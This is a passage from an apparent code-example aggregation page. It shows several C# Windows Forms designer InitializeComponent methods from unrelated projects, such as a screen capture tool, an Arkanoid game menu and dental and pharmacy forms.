            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "UpdatesWindow";
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Update Notice";
            this.ResumeLayout(false);

		}
Example #21
0
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(frmMain));
     this.picApp = new System.Windows.Forms.PictureBox();
     ((System.ComponentModel.ISupportInitialize)(this.picApp)).BeginInit();
     this.SuspendLayout();
     //
     // picApp
     //
     this.picApp.Location = new System.Drawing.Point(0, 0);
     this.picApp.Name = "picApp";
     this.picApp.Size = new System.Drawing.Size(292, 136);
     this.picApp.TabIndex = 0;
     this.picApp.TabStop = false;
     this.picApp.Click += new System.EventHandler(this.pictureBox1_Click);
     //
     // frmMain
     //
     this.ClientSize = new System.Drawing.Size(292, 136);
     this.Controls.Add(this.picApp);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox = false;
     this.Name = "frmMain";
     this.Text = "In Game";
     ((System.ComponentModel.ISupportInitialize)(this.picApp)).EndInit();
     this.ResumeLayout(false);
 }
Example #22
0
 private void InitializeComponent()
 {
     ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(frmLHXZ));
     this.btnClose = new Button();
     this.txt = new TextBox();
     base.SuspendLayout();
     this.btnClose.Location = new Point(150, 217);
     this.btnClose.Name = "btnClose";
     this.btnClose.Size = new Size(113, 29);
     this.btnClose.TabIndex = 12;
     this.btnClose.Text = "关闭";
     this.btnClose.UseVisualStyleBackColor = true;
     this.btnClose.Click += new EventHandler(this.btnClose_Click);
     this.txt.Location = new Point(0, 0);
     this.txt.Multiline = true;
     this.txt.Name = "txt";
     this.txt.Size = new Size(424, 211);
     this.txt.TabIndex = 13;
     base.AutoScaleMode = AutoScaleMode.None;
     base.ClientSize = new Size(422, 256);
     base.Controls.Add(this.txt);
     base.Controls.Add(this.btnClose);
     this.Font = new Font("宋体", 10f, FontStyle.Regular, GraphicsUnit.Point, 134);
     base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
     base.MaximizeBox = false;
     this.MaximumSize = new Size(430, 290);
     this.MinimumSize = new Size(430, 290);
     base.Name = "frmLHXZ";
     base.StartPosition = FormStartPosition.CenterScreen;
     this.Text = "理化性质";
     base.ResumeLayout(false);
     base.PerformLayout();
 }
Example #23
0
		/// <summary>
		/// Required method for Designer support - do not modify
		/// the contents of this method with the code editor.
		/// </summary>
		private void InitializeComponent()
		{
			System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(DavidTheCreator));
			this.pictureBox1 = new System.Windows.Forms.PictureBox();
			((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
			this.SuspendLayout();
			// 
			// pictureBox1
			// 
			this.pictureBox1.Dock = System.Windows.Forms.DockStyle.Fill;
			this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
			this.pictureBox1.Location = new System.Drawing.Point(0, 0);
			this.pictureBox1.Name = "pictureBox1";
			this.pictureBox1.Size = new System.Drawing.Size(300, 400);
			this.pictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.AutoSize;
			this.pictureBox1.TabIndex = 0;
			this.pictureBox1.TabStop = false;
			this.pictureBox1.Click += new System.EventHandler(this.pictureBox1_Click);
			// 
			// DavidTheCreator
			// 
			this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.None;
			this.ClientSize = new System.Drawing.Size(300, 400);
			this.Controls.Add(this.pictureBox1);
			this.Font = new System.Drawing.Font("Tahoma", 8.25F);
			this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
			this.Name = "DavidTheCreator";
			this.ShowInTaskbar = false;
			this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
			this.Text = "David is the creator of a history";
			((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
			this.ResumeLayout(false);
			this.PerformLayout();
		}
Example #24
0
 /// <summary>
 /// �f�U�C�i �T�|�[�g�ɕK�v�ȃ��\�b�h�ł��B���̃��\�b�h�̓�e��
 /// �R�[�h �G�f�B�^�ŕύX���Ȃ��ł��������B
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormOptions));
     this.PropertyGridOptions = new System.Windows.Forms.PropertyGrid();
     this.SuspendLayout();
     //
     // PropertyGridOptions
     //
     this.PropertyGridOptions.Dock = System.Windows.Forms.DockStyle.Fill;
     this.PropertyGridOptions.LineColor = System.Drawing.SystemColors.ScrollBar;
     this.PropertyGridOptions.Location = new System.Drawing.Point(0, 0);
     this.PropertyGridOptions.Name = "PropertyGridOptions";
     this.PropertyGridOptions.Size = new System.Drawing.Size(472, 454);
     this.PropertyGridOptions.TabIndex = 0;
     //
     // FormOptions
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 12);
     this.ClientSize = new System.Drawing.Size(472, 454);
     this.Controls.Add(this.PropertyGridOptions);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWindow;
     this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name = "FormOptions";
     this.Text = "�I�v�V����";
     this.ResumeLayout(false);
 }
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Main));
            this.btnCapture = new System.Windows.Forms.Button();
            this.SuspendLayout();
            // 
            // btnCapture
            // 
            this.btnCapture.BackgroundImage = global::digioz.desktop.capture.Properties.Resources.Record;
            this.btnCapture.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
            this.btnCapture.Location = new System.Drawing.Point(119, 2);
            this.btnCapture.Name = "btnCapture";
            this.btnCapture.Size = new System.Drawing.Size(54, 53);
            this.btnCapture.TabIndex = 0;
            this.btnCapture.UseVisualStyleBackColor = true;
            this.btnCapture.Click += new System.EventHandler(this.btnCapture_Click);
            // 
            // Main
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.BackColor = System.Drawing.Color.White;
            this.ClientSize = new System.Drawing.Size(298, 58);
            this.Controls.Add(this.btnCapture);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedToolWindow;
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "Main";
            this.ShowIcon = false;
            this.SizeGripStyle = System.Windows.Forms.SizeGripStyle.Hide;
            this.Text = "DigiOz Screen Capture";
            this.Load += new System.EventHandler(this.Form1_Load);
            this.ResumeLayout(false);

        }
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FindSymbolDialog));
            this.elementHost1 = new System.Windows.Forms.Integration.ElementHost();
            this.findSymbolControl1 = new Rubberduck.UI.FindSymbol.FindSymbolControl();
            this.SuspendLayout();
            // 
            // elementHost1
            // 
            this.elementHost1.Dock = System.Windows.Forms.DockStyle.Fill;
            this.elementHost1.Location = new System.Drawing.Point(0, 0);
            this.elementHost1.Name = "elementHost1";
            this.elementHost1.Size = new System.Drawing.Size(287, 24);
            this.elementHost1.TabIndex = 2;
            this.elementHost1.Child = this.findSymbolControl1;
            // 
            // FindSymbolDialog
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(287, 24);
            this.Controls.Add(this.elementHost1);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.MaximizeBox = false;
            this.MinimizeBox = false;
            this.Name = "FindSymbolDialog";
            this.ShowInTaskbar = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Rubberduck - Find Symbol";
            this.ResumeLayout(false);

        }
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(frmPrintPreview));
     this.crystalReportViewer1 = new CrystalDecisions.Windows.Forms.CrystalReportViewer();
     this.SuspendLayout();
     //
     // crystalReportViewer1
     //
     this.crystalReportViewer1.ActiveViewIndex = -1;
     this.crystalReportViewer1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
     this.crystalReportViewer1.Dock = System.Windows.Forms.DockStyle.Fill;
     this.crystalReportViewer1.Location = new System.Drawing.Point(0, 0);
     this.crystalReportViewer1.Name = "crystalReportViewer1";
     this.crystalReportViewer1.SelectionFormula = "";
     this.crystalReportViewer1.Size = new System.Drawing.Size(284, 262);
     this.crystalReportViewer1.TabIndex = 0;
     this.crystalReportViewer1.ViewTimeSelectionFormula = "";
     //
     // frmPrintPreview
     //
     this.ClientSize = new System.Drawing.Size(284, 262);
     this.Controls.Add(this.crystalReportViewer1);
     this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name = "frmPrintPreview";
     this.ResumeLayout(false);
 }
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FrmMinimap));
            this.editorView = new Soul.MapEditor.Core.Components.EditorViewControl();
            this.SuspendLayout();
            // 
            // editorView
            // 
            this.editorView.Component = null;
            this.editorView.Dock = System.Windows.Forms.DockStyle.Fill;
            this.editorView.GameLoopEnabled = true;
            this.editorView.Location = new System.Drawing.Point(0, 0);
            this.editorView.Name = "editorView";
            this.editorView.Size = new System.Drawing.Size(228, 193);
            this.editorView.TabIndex = 0;
            this.editorView.Text = "editorViewControl1";
            this.editorView.TimeStep = 16.66666F;
            // 
            // FrmMinimap
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(228, 193);
            this.Controls.Add(this.editorView);
            this.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name = "FrmMinimap";
            this.Text = "Minimap";
            this.ResumeLayout(false);

        }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(frmSplashPage));
     this.ascxSplashPage1 = new Owasp.VulnReport.ascx.ascxSplashPage();
     this.SuspendLayout();
     //
     // ascxSplashPage1
     //
     this.ascxSplashPage1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
                 | System.Windows.Forms.AnchorStyles.Left)
                 | System.Windows.Forms.AnchorStyles.Right)));
     this.ascxSplashPage1.Location = new System.Drawing.Point(0, 0);
     this.ascxSplashPage1.Name = "ascxSplashPage1";
     this.ascxSplashPage1.Size = new System.Drawing.Size(648, 408);
     this.ascxSplashPage1.TabIndex = 0;
     //
     // frmSplashPage
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize = new System.Drawing.Size(648, 414);
     this.ControlBox = false;
     this.Controls.Add(this.ascxSplashPage1);
     this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Name = "frmSplashPage";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text = "Owasp PenTest Reporter - Configuration Area";
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(MiddlePage));
     this.pictureBox1 = new System.Windows.Forms.PictureBox();
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
     this.SuspendLayout();
     //
     // Banner
     //
     this.Banner.Size = new System.Drawing.Size(465, 64);
     this.Banner.Subtitle = "Scan your credential to register or update it.";
     this.Banner.Title = "Scan A Credential";
     //
     // pictureBox1
     //
     this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
     this.pictureBox1.Location = new System.Drawing.Point(59, 70);
     this.pictureBox1.Name = "pictureBox1";
     this.pictureBox1.Size = new System.Drawing.Size(368, 236);
     this.pictureBox1.TabIndex = 1;
     this.pictureBox1.TabStop = false;
     //
     // MiddlePage
     //
     this.Controls.Add(this.pictureBox1);
     this.Name = "MiddlePage";
     this.Size = new System.Drawing.Size(465, 320);
     this.SetActive += new System.ComponentModel.CancelEventHandler(this.MiddlePage_SetActive);
     this.Controls.SetChildIndex(this.pictureBox1, 0);
     this.Controls.SetChildIndex(this.Banner, 0);
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
     this.ResumeLayout(false);
 }
Example #31
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(rptCtduoc));
     this.label1     = new System.Windows.Forms.Label();
     this.label2     = new System.Windows.Forms.Label();
     this.tu         = new System.Windows.Forms.DateTimePicker();
     this.den        = new System.Windows.Forms.DateTimePicker();
     this.butIn      = new System.Windows.Forms.Button();
     this.butKetthuc = new System.Windows.Forms.Button();
     this.label4     = new System.Windows.Forms.Label();
     this.manguon    = new System.Windows.Forms.ComboBox();
     this.kho        = new System.Windows.Forms.CheckedListBox();
     this.SuspendLayout();
     //
     // label1
     //
     this.label1.Location  = new System.Drawing.Point(1, 12);
     this.label1.Name      = "label1";
     this.label1.Size      = new System.Drawing.Size(56, 23);
     this.label1.TabIndex  = 0;
     this.label1.Text      = "Từ ngày :";
     this.label1.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
     //
     // label2
     //
     this.label2.Location  = new System.Drawing.Point(134, 12);
     this.label2.Name      = "label2";
     this.label2.Size      = new System.Drawing.Size(34, 23);
     this.label2.TabIndex  = 1;
     this.label2.Text      = "đến :";
     this.label2.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
     //
     // tu
     //
     this.tu.CustomFormat = "dd/MM/yyyy";
     this.tu.Font         = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.tu.Format       = System.Windows.Forms.DateTimePickerFormat.Custom;
     this.tu.Location     = new System.Drawing.Point(56, 12);
     this.tu.Name         = "tu";
     this.tu.Size         = new System.Drawing.Size(80, 21);
     this.tu.TabIndex     = 0;
     this.tu.KeyDown     += new System.Windows.Forms.KeyEventHandler(this.tu_KeyDown);
     //
     // den
     //
     this.den.CustomFormat = "dd/MM/yyyy";
     this.den.Font         = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.den.Format       = System.Windows.Forms.DateTimePickerFormat.Custom;
     this.den.Location     = new System.Drawing.Point(169, 12);
     this.den.Name         = "den";
     this.den.Size         = new System.Drawing.Size(80, 21);
     this.den.TabIndex     = 1;
     this.den.KeyDown     += new System.Windows.Forms.KeyEventHandler(this.tu_KeyDown);
     //
     // butIn
     //
     this.butIn.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butIn.Location   = new System.Drawing.Point(58, 197);
     this.butIn.Name       = "butIn";
     this.butIn.Size       = new System.Drawing.Size(70, 25);
     this.butIn.TabIndex   = 5;
     this.butIn.Text       = "&In";
     this.butIn.Click     += new System.EventHandler(this.butIn_Click);
     //
     // butKetthuc
     //
     this.butKetthuc.ImageAlign = System.Drawing.ContentAlignment.MiddleLeft;
     this.butKetthuc.Location   = new System.Drawing.Point(130, 197);
     this.butKetthuc.Name       = "butKetthuc";
     this.butKetthuc.Size       = new System.Drawing.Size(70, 25);
     this.butKetthuc.TabIndex   = 6;
     this.butKetthuc.Text       = "&Kết thúc";
     this.butKetthuc.Click     += new System.EventHandler(this.butKetthuc_Click);
     //
     // label4
     //
     this.label4.Location  = new System.Drawing.Point(1, 32);
     this.label4.Name      = "label4";
     this.label4.Size      = new System.Drawing.Size(56, 23);
     this.label4.TabIndex  = 8;
     this.label4.Text      = "Nguồn :";
     this.label4.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
     //
     // manguon
     //
     this.manguon.Font       = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.manguon.ItemHeight = 13;
     this.manguon.Location   = new System.Drawing.Point(56, 35);
     this.manguon.Name       = "manguon";
     this.manguon.Size       = new System.Drawing.Size(192, 21);
     this.manguon.TabIndex   = 2;
     this.manguon.KeyDown   += new System.Windows.Forms.KeyEventHandler(this.tu_KeyDown);
     //
     // kho
     //
     this.kho.Font     = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.kho.Location = new System.Drawing.Point(56, 59);
     this.kho.Name     = "kho";
     this.kho.Size     = new System.Drawing.Size(192, 132);
     this.kho.TabIndex = 4;
     //
     // rptCtduoc
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize        = new System.Drawing.Size(258, 239);
     this.Controls.Add(this.kho);
     this.Controls.Add(this.manguon);
     this.Controls.Add(this.label4);
     this.Controls.Add(this.butKetthuc);
     this.Controls.Add(this.butIn);
     this.Controls.Add(this.den);
     this.Controls.Add(this.tu);
     this.Controls.Add(this.label2);
     this.Controls.Add(this.label1);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.Icon            = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox     = false;
     this.MinimizeBox     = false;
     this.Name            = "rptCtduoc";
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "Công tác dược";
     this.MouseMove      += new System.Windows.Forms.MouseEventHandler(this.rptCtDuoc_MouseMove);
     this.Load           += new System.EventHandler(this.rptCtduoc_Load);
     this.ResumeLayout(false);
 }
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources =
         new System.ComponentModel.ComponentResourceManager(typeof(FrmMainMenu));
     this.picArkanoidLetters = new System.Windows.Forms.PictureBox();
     this.btnPlay            = new System.Windows.Forms.Button();
     this.btnTopScore        = new System.Windows.Forms.Button();
     this.btnExit            = new System.Windows.Forms.Button();
     this.tableLayoutPanel1  = new System.Windows.Forms.TableLayoutPanel();
     this.instructionsUC1    = new Arkanoid.InstructionsUC();
     this.btnInstructions    = new System.Windows.Forms.Button();
     ((System.ComponentModel.ISupportInitialize)(this.picArkanoidLetters)).BeginInit();
     this.tableLayoutPanel1.SuspendLayout();
     this.SuspendLayout();
     //
     // picArkanoidLetters
     //
     this.picArkanoidLetters.BackColor             = System.Drawing.Color.Transparent;
     this.picArkanoidLetters.BackgroundImage       = global::Arkanoid.Properties.Resources.Arkanoid_lettersblue;
     this.picArkanoidLetters.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Zoom;
     this.picArkanoidLetters.Dock     = System.Windows.Forms.DockStyle.Fill;
     this.picArkanoidLetters.Location = new System.Drawing.Point(387, 3);
     this.picArkanoidLetters.Name     = "picArkanoidLetters";
     this.picArkanoidLetters.Size     = new System.Drawing.Size(478, 78);
     this.picArkanoidLetters.SizeMode = System.Windows.Forms.PictureBoxSizeMode.Zoom;
     this.picArkanoidLetters.TabIndex = 0;
     this.picArkanoidLetters.TabStop  = false;
     //
     // btnPlay
     //
     this.btnPlay.AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.btnPlay.BackColor    = System.Drawing.Color.MediumBlue;
     this.btnPlay.Dock         = System.Windows.Forms.DockStyle.Fill;
     this.btnPlay.Font         = new System.Drawing.Font("Segoe UI", 16F, System.Drawing.FontStyle.Regular,
                                                         System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.btnPlay.ForeColor = System.Drawing.Color.White;
     this.btnPlay.Location  = new System.Drawing.Point(387, 171);
     this.btnPlay.Name      = "btnPlay";
     this.btnPlay.Size      = new System.Drawing.Size(478, 78);
     this.btnPlay.TabIndex  = 1;
     this.btnPlay.Text      = "Play";
     this.btnPlay.UseVisualStyleBackColor = false;
     this.btnPlay.Click      += new System.EventHandler(this.btnPlay_Click);
     this.btnPlay.MouseLeave += new System.EventHandler(this.btnPlay_MouseLeave);
     this.btnPlay.MouseHover += new System.EventHandler(this.btnPlay_MouseHover);
     //
     // btnTopScore
     //
     this.btnTopScore.AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.btnTopScore.BackColor    = System.Drawing.Color.MediumBlue;
     this.btnTopScore.Dock         = System.Windows.Forms.DockStyle.Fill;
     this.btnTopScore.Font         = new System.Drawing.Font("Segoe UI", 16F, System.Drawing.FontStyle.Regular,
                                                             System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.btnTopScore.ForeColor = System.Drawing.Color.White;
     this.btnTopScore.Location  = new System.Drawing.Point(387, 339);
     this.btnTopScore.Name      = "btnTopScore";
     this.btnTopScore.Size      = new System.Drawing.Size(478, 78);
     this.btnTopScore.TabIndex  = 2;
     this.btnTopScore.Text      = "Top Score";
     this.btnTopScore.UseVisualStyleBackColor = false;
     this.btnTopScore.Click      += new System.EventHandler(this.btnTopScore_Click);
     this.btnTopScore.MouseLeave += new System.EventHandler(this.btnTopScore_MouseLeave);
     this.btnTopScore.MouseHover += new System.EventHandler(this.btnTopScore_MouseHover);
     //
     // btnExit
     //
     this.btnExit.AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.btnExit.BackColor    = System.Drawing.Color.MediumBlue;
     this.btnExit.Dock         = System.Windows.Forms.DockStyle.Fill;
     this.btnExit.Font         = new System.Drawing.Font("Segoe UI", 16F, System.Drawing.FontStyle.Regular,
                                                         System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.btnExit.ForeColor = System.Drawing.Color.White;
     this.btnExit.Location  = new System.Drawing.Point(387, 507);
     this.btnExit.Name      = "btnExit";
     this.btnExit.Size      = new System.Drawing.Size(478, 78);
     this.btnExit.TabIndex  = 3;
     this.btnExit.Text      = "Exit";
     this.btnExit.UseVisualStyleBackColor = false;
     this.btnExit.Click      += new System.EventHandler(this.btnExit_Click);
     this.btnExit.MouseLeave += new System.EventHandler(this.btnExit_MouseLeave);
     this.btnExit.MouseHover += new System.EventHandler(this.btnExit_MouseHover);
     //
     // tableLayoutPanel1
     //
     this.tableLayoutPanel1.AutoSizeMode    = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.tableLayoutPanel1.BackgroundImage = global::Arkanoid.Properties.Resources.MainMenuBackground;
     this.tableLayoutPanel1.ColumnCount     = 4;
     this.tableLayoutPanel1.ColumnStyles.Add(
         new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 40.04171F));
     this.tableLayoutPanel1.ColumnStyles.Add(
         new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 50.46924F));
     this.tableLayoutPanel1.ColumnStyles.Add(
         new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 9.489051F));
     this.tableLayoutPanel1.ColumnStyles.Add(
         new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Absolute, 388F));
     this.tableLayoutPanel1.Controls.Add(this.picArkanoidLetters, 1, 0);
     this.tableLayoutPanel1.Controls.Add(this.btnPlay, 1, 2);
     this.tableLayoutPanel1.Controls.Add(this.btnExit, 1, 6);
     this.tableLayoutPanel1.Controls.Add(this.btnTopScore, 1, 4);
     this.tableLayoutPanel1.Controls.Add(this.instructionsUC1, 0, 0);
     this.tableLayoutPanel1.Controls.Add(this.btnInstructions, 2, 2);
     this.tableLayoutPanel1.Dock     = System.Windows.Forms.DockStyle.Fill;
     this.tableLayoutPanel1.Location = new System.Drawing.Point(0, 0);
     this.tableLayoutPanel1.Name     = "tableLayoutPanel1";
     this.tableLayoutPanel1.RowCount = 8;
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 14.28571F));
     this.tableLayoutPanel1.RowStyles.Add(
         new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Absolute, 42F));
     this.tableLayoutPanel1.Size     = new System.Drawing.Size(1348, 634);
     this.tableLayoutPanel1.TabIndex = 5;
     //
     // instructionsUC1
     //
     this.instructionsUC1.AutoSizeMode = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.instructionsUC1.Dock         = System.Windows.Forms.DockStyle.Fill;
     this.instructionsUC1.Location     = new System.Drawing.Point(2, 3);
     this.instructionsUC1.Margin       = new System.Windows.Forms.Padding(2, 3, 2, 3);
     this.instructionsUC1.Name         = "instructionsUC1";
     this.tableLayoutPanel1.SetRowSpan(this.instructionsUC1, 8);
     this.instructionsUC1.Size     = new System.Drawing.Size(380, 628);
     this.instructionsUC1.TabIndex = 4;
     //
     // btnInstructions
     //
     this.btnInstructions.AutoSizeMode            = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.btnInstructions.BackColor               = System.Drawing.SystemColors.ButtonHighlight;
     this.btnInstructions.Dock                    = System.Windows.Forms.DockStyle.Fill;
     this.btnInstructions.Image                   = ((System.Drawing.Image)(resources.GetObject("btnInstructions.Image")));
     this.btnInstructions.Location                = new System.Drawing.Point(871, 171);
     this.btnInstructions.Name                    = "btnInstructions";
     this.btnInstructions.Size                    = new System.Drawing.Size(85, 78);
     this.btnInstructions.TabIndex                = 5;
     this.btnInstructions.UseVisualStyleBackColor = false;
     this.btnInstructions.MouseLeave             += new System.EventHandler(this.btnInstructions_MouseLeave);
     this.btnInstructions.MouseHover             += new System.EventHandler(this.btnInstructions_MouseHover);
     //
     // FrmMainMenu
     //
     this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Inherit;
     this.AutoSizeMode  = System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.ClientSize    = new System.Drawing.Size(1348, 634);
     this.Controls.Add(this.tableLayoutPanel1);
     this.Icon          = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.Margin        = new System.Windows.Forms.Padding(3, 4, 3, 4);
     this.Name          = "FrmMainMenu";
     this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.FormClosing  += new System.Windows.Forms.FormClosingEventHandler(this.FrmMainMenu_FormClosing);
     ((System.ComponentModel.ISupportInitialize)(this.picArkanoidLetters)).EndInit();
     this.tableLayoutPanel1.ResumeLayout(false);
     this.ResumeLayout(false);
 }
Example #33
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormPatFieldEdit));
     this.butCancel      = new OpenDental.UI.Button();
     this.butOK          = new OpenDental.UI.Button();
     this.labelName      = new System.Windows.Forms.Label();
     this.textValue      = new System.Windows.Forms.TextBox();
     this.butUseAutoNote = new OpenDental.UI.Button();
     this.SuspendLayout();
     //
     // butCancel
     //
     this.butCancel.AdjustImageLocation = new System.Drawing.Point(0, 0);
     this.butCancel.Anchor       = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
     this.butCancel.Autosize     = true;
     this.butCancel.BtnShape     = OpenDental.UI.enumType.BtnShape.Rectangle;
     this.butCancel.BtnStyle     = OpenDental.UI.enumType.XPStyle.Silver;
     this.butCancel.CornerRadius = 4F;
     this.butCancel.DialogResult = System.Windows.Forms.DialogResult.Cancel;
     this.butCancel.Location     = new System.Drawing.Point(280, 147);
     this.butCancel.Name         = "butCancel";
     this.butCancel.Size         = new System.Drawing.Size(75, 24);
     this.butCancel.TabIndex     = 2;
